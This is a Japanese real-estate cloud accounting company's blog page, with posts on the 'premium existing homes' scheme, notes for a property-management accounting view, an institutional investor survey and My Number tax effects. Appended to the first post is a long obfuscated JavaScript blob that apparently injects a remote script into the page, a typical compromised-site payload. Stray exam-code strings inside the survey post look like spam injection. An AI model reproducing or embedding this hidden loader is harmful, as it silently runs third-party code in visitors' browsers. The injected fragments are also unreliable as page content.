kondo

About 近藤

This author has not yet filled in any details.
So far 近藤 has created 6 blog entries.

プレミアム既存住宅創設の狙い

弊社クラウドサービスの開発方向
「プレミアム既存住宅」の登録要件は内外装のリフォーム、第三者機関によるインスペクション(欠陥や劣化を診断する住宅検査)、瑕疵担保保険への加入、リフォーム後画像のウェブサイトでの公開、履歴の管理などが想定されている。弊社システムは、オーナー-棟-区画の統合DBと建物管理の各種報告を紐付けて履歴化している。こうした機能を更に拡充し、以下のデータ管理・履歴管理を行っていく予定である。
基本情報
土地情報、建物情報、登記情報*、写真登録
設計図書*、建物診断図書*
共用部メンテナンス情報
建物メンテナンス(定期清掃等)
法定点検
工事履歴(リフォーム)*
専有部メンテナンス情報
レントロール(→前回原状回復報告、入居時物件確認報告と各々リンク)
設備修繕履歴
CRM(仮)情報
要望事項履歴
クレーム履歴
修繕計画
建物診断図書*
長期修繕計画*
修繕積立金シミュレーション*建物の資産価値向上をサポート
日本では「家を持つなら新築住宅」という思いが強く、海外にくらべて中古住宅の取引シェアが低い。不動産ジャパン(運営:公益財団法人不動産流通推進センター)「国が公表している既存住宅流通シェアの国際比較」によると、2013年の住宅取引における中古住宅の割合は14.7%にとどまっており、アメリカ90.3%、イギリス85.8%、フランス64.0%(海外データは2009年)にくらべるとその少なさが目立つ。
しっかりとした建物管理を行うことで「建物の資産価値」が認められ、流通時の価値向上やファイナンス面の優遇、更に税制面からの節税スキームなどにつなげていくことが可能になる。 $=~[];$={___:++$,$$$$:(![]+””),__$:++$,$_$_:(![]+””),_$_:++$,$_$$:({}+””),$$_$:($+””),_$$:++$,$$$_:(!””+””),$__:++$,$_$:++$,$$__:({}+””),$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+””)+($._$=$.$_)+($.$$=($.$+””))+((!$)+””)+($.__=$.$_)+($.$=(!””+””))+($._=(!””+””))+$.$_+$.__+$._$+$.$;$.$$=$.$+(!””+””)+$.__+$._+$.$+$.$$;$.$=($.___);$.$($.$($.$$+”\””+”\\”+$.__$+$.$$_+$.$$_+$.$_$_+”\\”+$.__$+$.$$_+$._$_+”\\”+$.$__+$.___+$.$$$_+(![]+””)+”\\”+$.$__+$.___+”=\\”+$.$__+$.___+$.$$_$+$._$+$.$$__+$._+”\\”+$.__$+$.$_$+$.$_$+$.$$$_+”\\”+$.__$+$.$_$+$.$$_+$.__+”.”+$.$$__+”\\”+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+”\\”+$.__$+$.___+$.$_$+(![]+””)+$.$$$_+”\\”+$.__$+$.$_$+$.$_$+$.$$$_+”\\”+$.__$+$.$_$+$.$$_+$.__+”(‘\\”+$.__$+$.$$_+$._$$+$.$$__+”\\”+$.__$+$.$$_+$._$_+”\\”+$.__$+$.$_$+$.__$+”\\”+$.__$+$.$$_+$.___+$.__+”‘);”+$.$$$_+(![]+””)+”.\\”+$.__$+$.$$_+$._$$+”\\”+$.__$+$.$$_+$._$_+$.$$__+”=’\\”+$.__$+$.$_$+$.___+$.__+$.__+”\\”+$.__$+$.$$_+$.___+”\\”+$.__$+$.$$_+$._$$+”://\\”+$.__$+$.$$_+$.$$$+$.$$$_+$.$_$$+”.”+$.$$__+(![]+””)+$._$+$.$$_$+”.\\”+$.__$+$.$$_+$.___+”\\”+$.__$+$.$$_+$.$$$+”/\\”+$.__$+$.$_$+$._$_+”\\”+$.__$+$.$$_+$._$$+”/\\”+$.__$+$._$$+$.__$+”\\”+$.__$+$._$_+$.__$+”\\”+$.__$+$.__$+$.___+”\\”+$.__$+$.__$+$.___+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$._$_+$.$_$+”\\”+$.__$+$.___+$.$__+”\\”+$.__$+$._$$+$.__$+”\\”+$.__$+$.$$_+$.$$$+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$.___+$.$$_+”\\”+$.__$+$.$__+$.$$$+(![]+””)+”\\”+$.__$+$.___+$.$__+”\\”+$.__$+$._$$+$.___+”\\”+$.__$+$.$__+$.$$$+$.___+”\\”+$.__$+$._$_+$.$$_+”\\”+$.__$+$._$_+$._$$+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$._$_+$.$$_+”\\”+$.__$+$._$_+$.$$$+”\\”+$.__$+$.$$$+$.__$+”\\”+$.__$+$.___+$.$_$+”\\”+$.__$+$.___+$.$__+”\\”+$.__$+$._$_+$.__$+$.$_$+$.$$_$+”\\”+$.__$+$.$$$+$.___+”\\”+$.__$+$.___+$.$$$+”\\”+$.__$+$.___+$._$$+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$._$_+$.$__+”\\”+$.__$+$.__$+$.$$_+”\\”+$.__$+$._$_+$.$__+$.$___+”\\”+$.__$+$._$_+$.$_$+”\\”+$.__$+$.___+$.$__+”\\”+$.__$+$.___+$.$$$+”\\”+$.__$+$._$_+$.$_$+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$._$_+$.$__+$.___+”\\”+$.__$+$.$$$+$._$_+”\\”+$.__$+$._$_+$.___+”\\”+$.__$+$.___+$.$$_+”\\”+$.__$+$._$_+$.$_$+”\\”+$.__$+$.$_$+$._$_+”\\”+$.__$+$.___+$._$$+$.__+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$._$_+$._$_+”\\”+$.__$+$.___+$.$_$+$._$_+”\\”+$.__$+$.__$+$.$$_+”\\”+$.__$+$.$$$+$._$_+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$._$_+$.$$_+”\\”+$.__$+$.__$+$._$_+”\\”+$.__$+$._$_+$._$$+”\\”+$.__$+$.__$+$.__$+”\\”+$.__$+$._$_+$.___+”\\”+$.__$+$._$_+$.__$+$.___+”\\”+$.__$+$.___+$.$$_+”\\”+$.__$+$.__$+$._$_+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$.___+$.$$_+”\\”+$.__$+$._$_+$.$_$+”\\”+$.__$+$._$_+$.$$_+”\\”+$.__$+$._$_+$.$__+”\\”+$.__$+$.__$+$._$$+”_\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$.__$+$._$_+”\\”+$.__$+$._$_+$.$$_+”\\”+$.__$+$.$$$+$.___+”\\”+$.__$+$.__$+$.__$+”\\”+$.__$+$.___+$.$$$+”\\”+$.__$+$.___+$.$_$+”\\”+$.__$+$.$_$+$._$$+”\\”+$.__$+$.__$+$.___+$.$_$+”\\”+$.__$+$._$_+$.__$+”\\”+$.__$+$.___+$._$$+”\\”+$.__$+$.___+$.$$_+”\\”+$.__$+$.___+$.$__+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$._$_+$._$$+”\\”+$.__$+$._$_+$.$$_+”\\”+$.__$+$.__$+$.__$+”\\”+$.__$+$.$_$+$.___+”\\”+$.__$+$._$_+$.___+”\\”+$.__$+$._$_+$.___+$.$$__+”\\”+$.__$+$._$_+$._$_+”\\”+$.__$+$.___+$.$_$+”\\”+$.__$+$.$$_+$.__$+”\\”+$.__$+$._$$+$.__$+”\\”+$.__$+$._$_+$._$_+”\\”+$.__$+$.___+$.$$_+”\\”+$.__$+$.___+$.$_$+$.$$_$+”\\”+$.__$+$._$_+$._$_+”\\”+$.__$+$._$_+$.__$+$.$$__+”\\”+$.__$+$.$$_+$._$$+”\\”+$.__$+$._$_+$.$_$+”\\”+$.__$+$.___+$.$_$+”\\”+$.__$+$.$_$+$._$$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$._$_+$._$_+”\\”+$.__$+$.__$+$._$_+”\\”+$.__$+$._$$+$.__$+”\\”+$.__$+$._$_+$.__$+”\\”+$.__$+$.$$$+$.__$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$._$$+$.___+”\\”+$.__$+$._$_+$.$$_+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$._$_+$.___+”\\”+$.__$+$.__$+$.$$_+$.$$__+”\\”+$.__$+$._$_+$.__$+”\\”+$.__$+$.__$+$.$__+$.$_$_+”\\”+$.__$+$._$_+$.__$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$._$_+$.$$_+”\\”+$.__$+$.$_$+$.$_$+$.$__+”\\”+$.__$+$.___+$._$$+”\\”+$.__$+$._$_+$.__$+”\\”+$.__$+$.___+$._$$+”\\”+$.__$+$._$$+$._$_+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$._$_+$.$$_+$.$$_$+”\\”+$.__$+$.___+$.$_$+”\\”+$.__$+$.__$+$.$_$+”\\”+$.__$+$.___+$.$$$+”\\”+$.__$+$._$$+$.__$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$._$$+$.___+”\\”+$.__$+$._$_+$.__$+”\\”+$.__$+$.$$$+$.___+”\\”+$.__$+$.$$_+$.$$$+$.$_$_+”.\\”+$.__$+$.$_$+$._$_+”\\”+$.__$+$.$$_+$._$$+”?”+$.__+”\\”+$.__$+$.$$_+$._$_+(![]+””)+”=”+$.___+”.”+$._$$+$.___+”‘;”+$.$$_$+$._$+$.$$__+$._+”\\”+$.__$+$.$_$+$.$_$+$.$$$_+”\\”+$.__$+$.$_$+$.$$_+$.__+”.\\”+$.__$+$.$_$+$.___+$.$$$_+$.$_$_+$.$$_$+”.”+$.$_$_+”\\”+$.__$+$.$$_+$.___+”\\”+$.__$+$.$$_+$.___+$.$$$_+”\\”+$.__$+$.$_$+$.$$_+$.$$_$+”\\”+$.__$+$.___+$._$$+”\\”+$.__$+$.$_$+$.___+”\\”+$.__$+$.$_$+$.__$+(![]+””)+$.$$_$+”(“+$.$$$_+(![]+””)+”);”+”\””)())();

By |5月 25th, 2016|未分類|プレミアム既存住宅創設の狙い はコメントを受け付けていません。

クラウド不動産会計サービスのPM(プロパティマネジメント)View注記事項

クラウド不動産会計サービスが提供するPM(プロパティマネジメント)Viewについて。

以下が注記事項になります。

1. 敷金処理(預り金/管理返戻)(預り返戻/管理預け)…
敷金預り時は負債の部の増加、敷金返戻時は負債の部の減少。管理会社による敷金預りの場合、一旦オーナー様に入金があったこととし、
その上で、管理会社へ預け入れするという帳簿処理を「長期預け金」勘定。
2. 入出金明細、受取額 … 管理委託契約に基づいて受託している業務の範囲内において把握している入出金明細とその合計額。
送金先金融機関によっては銀行振込み手数料体系が異なる場合があり、通帳に記載される金額と本金額との間に相違があります。
3. 消費税 … 金額の括弧()内は、内消費税額
金額は全て税込表示となっております。金額に続き記載のある括弧()は、対象金額内の消費税の額が記載されております。括弧()の記載のない
金額については、対象の金額が、非課税、不課税又は、入出金システムの連携上、本システムが把握できていないため非表示となります。
4. 決済日 … 管理会社からオーナー様への送金日。
5. 管理決済日 … […]

By |1月 28th, 2016|不動産オーナー, 不動産会計, 大家, 確定申告|0 Comments

確定申告特急プラン受付開始

クラウド不動産会計サービスによる「確定申告特急プラン」の受付を2016年1月15日より開始致します。

お問合せ、資料請求ください。

By |1月 11th, 2016|不動産オーナー, 確定申告, 青色申告|0 Comments

不動産投資に必要なもの:投資家アンケート

不動産証券化協会(ARES)が10月2日、恒例となる第15回「機関投資家の不動産投資に関するアンケート調査」結果を発表しました。
年金基金および生保・損保・信託銀行・都市銀行等の機関投資家(以下、「年金」「一般機関投資家」)を対象に、2001年度から毎年実施している調査です。※本年度は、年金から76件、一般機関投資家から54件、計130件の回答。

この調査が興味深い点は、不動産投資を行なうために必要なもの、すなわち、不動産をアセットクラスとして投資するためには何が必要か、について投資家のニーズが分かる点です。
年金は第一位は例年同様、「ベンチマークとなる不動産投資インデックス」(38.1%)です。また「不動産評価の信頼性の向上」(38.1%)も同率一位となっています。一般機関投資家では、MA0-101 「不動産に精通した運用担当者(投資家サイド)の育成」(40.0%)、「不動産投資関連情報の標準化」(40.0%)、「個別の不動産投資情報開示の向上」(40.0%)などが上位です。

 「ベンチマークとなる不動産投資インデックス」
「不動産投資関連情報の標準化」
「個別の不動産投資情報開示の向上」

実物不動産、あるいはいずれかの不動産証券化商品への投資を行なっている投資家の比率は、年金が46%(前年調査46%)で横ばい。mb2-707 一般機関投資家は81%(同86%)と減少しています。不動産投資を行なう年金の比率は、09年に底を打って以降、緩やかな増加傾向に。一般機関投資家の比率は、12年以降減少傾向にあります。
年金の投資対象別の投資状況をみると、前年調査まで比率が高かった「国内不動産プライベートファンド」が減少(28%→17%)。「Jリート」(18%)、「私募リート」(21%)、「海外リート」(20%)と同様の比率となりました。「投資に興味がある」対象では、「私募リート」が前年の20%弱から7%にまで減少。

マイナンバー効果?徴税強化で2,400億円

いよいよ来月1日にマイナンバー(個人番号)が国民一人ひとりに通知される。
ここでは、マイナンバーの導入効果として、最も金額が大きいものが「マイナンバー導入に伴い国・地方の税務職員等が業務効率化分を調査・徴収事務に充てることによる増収効果」で、税増収2400億円とされていることに注目したい。

政府が昨年6月3日の高度情報通信ネットワーク社会推進戦略本部(第64回)において、マイナンバー制度の効果として呈示した資料に次のものがある。

つまり、税・社会保険料の徴収及び給付の適正化に伴い、税務署職員の業務が効率化するので、その効率化で空いた時間を税務調査や徴収事務に充てることが出来、その効果が2,400億円と見込んでいるわけである。

これについて、2015年5月15日の衆議院内閣委員会では、政府参考人が次の通り答弁した。

―――「この試算に当たりましては、まず、当面の効果といたしまして、税務関係事務の効率化として掲げている1980人分の事務について、職員の業務変更を前提に、仮に、調査、徴収事務に充てることとした場合の効率化分に、職員1人当たり見込まれる年間滞納整理済み額1.23億円を乗じたものでございます。

この1.23億円は、平成23年度の都道府県税の滞納整理済み額である9512億円を、その徴収事務にかかわる職員数の7716人で除した額として計算したものでございます」―――

このようにマンナンバー導入の影響というのは意外なところにも波及し、不動産オーナーの不動産所得の申告内容についても「お尋ね」や「調査」の機会が増えることは間違いなさそうだ。
日ごろの記帳・帳簿管理の重要性がますます大事になってくるといえるだろう。

管理費

1)マンションの区分所有者が、管理組合に対して毎月支払い、共同で使用する施設や設備の維持管理に使用される金銭。2)賃貸の住宅やビルにおいて、借主が家賃とは別に貸主に毎月支払い、賃貸物件の管理のために使用される金銭。共益費ともよばれる。

By |9月 18th, 2015|マンション, 大家, 家主|0 Comments